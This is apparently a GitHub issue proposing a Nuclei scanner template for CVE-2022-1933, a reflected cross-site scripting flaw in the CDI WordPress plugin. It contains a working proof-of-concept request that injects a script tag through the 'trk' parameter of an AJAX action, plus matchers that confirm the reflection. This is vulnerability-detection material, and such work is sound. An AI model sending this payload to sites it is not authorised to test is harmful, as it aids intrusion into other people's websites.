### ISSUE TITLE
CDI < 5.1.9 - Reflected Cross-Site-Scripting

### ISSUE THREAD

**Issue by akincibor** [projectdiscovery/nuclei-templates#4814]
```yaml
id: CVE-2022-1933

info:
  name: CDI < 5.1.9 - Reflected Cross-Site-Scripting
  author: Akincibor
  severity: medium
  description: The plugin does not sanitise and escape a parameter before outputting it back in the response of an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected Cross-Site Scripting.
  reference:
    - https://wpscan.com/vulnerability/6cedb27f-6140-4cba-836f-63de98e521bf
  tags: wp-plugin,xss,wp,wordpress,cdi

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=cdi_collect_follow&trk=%3Cscript%3Ealert(document.domain)%3C/script%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
```
